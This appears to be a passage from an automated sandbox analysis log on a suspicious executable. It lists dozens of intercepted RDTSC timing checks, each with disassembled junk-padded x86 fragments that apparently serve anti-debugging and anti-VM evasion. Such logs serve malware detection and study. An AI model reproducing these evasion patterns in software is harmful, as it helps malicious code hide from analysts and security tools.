                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE072 second address: 11EE084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE084 second address: 11EE0A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD9092ECB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FD9092ECB2Ch 0x00000018 jbe 00007FD9092ECB26h 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE0A2 second address: 11EE0A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F45EB second address: 11F45EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F45EF second address: 11F45F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4B35 second address: 11F4B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4B3A second address: 11F4B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4CC4 second address: 11F4CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4CC8 second address: 11F4CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4CCE second address: 11F4CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4CD8 second address: 11F4CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4CDC second address: 11F4CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA29C second address: 11FA2A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD908C4C6E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2A6 second address: 11FA2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2AA second address: 11FA2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2B9 second address: 11FA2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2BF second address: 11FA2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2C3 second address: 11FA2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA423 second address: 11FA43A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD908C4C6F2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AC17F second address: 11AC1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD9092ECB32h 0x00000008 pop eax 0x00000009 jbe 00007FD9092ECB37h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD9092ECB2Eh 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB354 second address: 11FB359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB359 second address: 11FB35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9D3B second address: 11F9D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD908C4C6EBh 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FD908C4C6E6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12040EB second address: 12040EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12040EF second address: 12040F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12040F7 second address: 12040FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12040FC second address: 120410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD908C4C6E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120410A second address: 1204144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD9092ECB26h 0x0000000a jmp 00007FD9092ECB39h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD9092ECB32h 0x0000001a jo 00007FD9092ECB26h 0x00000020 jno 00007FD9092ECB26h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202D3E second address: 1202D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202D56 second address: 1202D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD9092ECB36h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120332F second address: 1203339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD908C4C6E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202A64 second address: 1202A82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD9092ECB34h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202A82 second address: 1202A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12038AA second address: 12038D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD9092ECB31h 0x0000000d jmp 00007FD9092ECB30h 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206EA9 second address: 1206EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B494 second address: 120B498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B498 second address: 120B4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD908C4C6F9h 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B4C5 second address: 120B4C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B4C9 second address: 120B4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11841FD second address: 118420B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD9092ECB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118420B second address: 118420F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118420F second address: 1184219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEA0D second address: 11CEA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEA11 second address: 11CEA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEA17 second address: 11CEA2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FD908C4C6E6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEAD1 second address: 11CEAEB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD9092ECB2Ch 0x00000008 jnc 00007FD9092ECB26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEAEB second address: 11CEAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEAF4 second address: 11CEAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEAF8 second address: 11CEAFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEC2E second address: 11CEC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CEFD3 second address: 11CF05B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FD908C4C6E8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000004h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FD908C4C6E8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov edx, 4B2438B7h 0x00000047 nop 0x00000048 jnc 00007FD908C4C6FBh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push ecx 0x00000052 push esi 0x00000053 pop esi 0x00000054 pop ecx 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF57F second address: 11CF583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF756 second address: 11CF797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnp 00007FD908C4C6E8h 0x0000000d popad 0x0000000e nop 0x0000000f jnp 00007FD908C4C6ECh 0x00000015 lea eax, dword ptr [ebp+124831A3h] 0x0000001b jmp 00007FD908C4C6ECh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD908C4C6EFh 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A50A second address: 120A515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A515 second address: 120A53E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD908C4C704h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A53E second address: 120A544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A6B6 second address: 120A6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A6BA second address: 120A6C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A6C2 second address: 120A6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EDh 0x00000009 jmp 00007FD908C4C6F2h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120AC8C second address: 120ACA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB32h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120ACA4 second address: 120ACE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnl 00007FD908C4C6ECh 0x00000014 jnp 00007FD908C4C6E6h 0x0000001a jne 00007FD908C4C6EEh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007FD908C4C6F3h 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120ACE8 second address: 120ACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120AECC second address: 120AED2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120AED2 second address: 120AEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120AEDC second address: 120AEE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B025 second address: 120B04C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB32h 0x00000007 jmp 00007FD9092ECB31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B04C second address: 120B073 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FD908C4C6E6h 0x00000009 jne 00007FD908C4C6E6h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FD908C4C6EEh 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120B073 second address: 120B079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120F211 second address: 120F22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD908C4C6F6h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211569 second address: 121156E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121156E second address: 12115B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FD908C4C6F4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD908C4C6EAh 0x00000015 jmp 00007FD908C4C6F4h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216A13 second address: 1216A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9092ECB36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216A2F second address: 1216A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216A39 second address: 1216A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FD9092ECB37h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216A60 second address: 1216A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD908C4C6EDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF1DE second address: 11CF24E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov edi, 57ABBF92h 0x0000000d mov ebx, dword ptr [ebp+1248319Eh] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FD9092ECB28h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d or edx, dword ptr [ebp+122D3021h] 0x00000033 add eax, ebx 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD9092ECB28h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f je 00007FD9092ECB2Ch 0x00000055 mov dword ptr [ebp+122D2615h], ebx 0x0000005b nop 0x0000005c push eax 0x0000005d push edx 0x0000005e jnc 00007FD9092ECB2Ch 0x00000064 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF24E second address: 11CF2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FD908C4C6F1h 0x00000010 jmp 00007FD908C4C6EBh 0x00000015 nop 0x00000016 pushad 0x00000017 or cl, 00000021h 0x0000001a mov bx, A1A9h 0x0000001e popad 0x0000001f push 00000004h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FD908C4C6E8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b adc ecx, 4E60BE33h 0x00000041 mov edx, 7CDBB324h 0x00000046 nop 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push esi 0x0000004b pop esi 0x0000004c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216EC2 second address: 1216EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216EDF second address: 1216F13 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD908C4C6ECh 0x00000008 jmp 00007FD908C4C6ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD908C4C6EDh 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007FD908C4C6E6h 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12178F9 second address: 12178FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E797 second address: 121E79D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DB31 second address: 121DB37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DDA0 second address: 121DDB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD908C4C6EAh 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DDB8 second address: 121DDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DDBC second address: 121DDC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DDC0 second address: 121DDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DF41 second address: 121DF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E20B second address: 121E232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnp 00007FD9092ECB26h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FD9092ECB2Fh 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E232 second address: 121E242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FD908C4C6E6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E242 second address: 121E257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
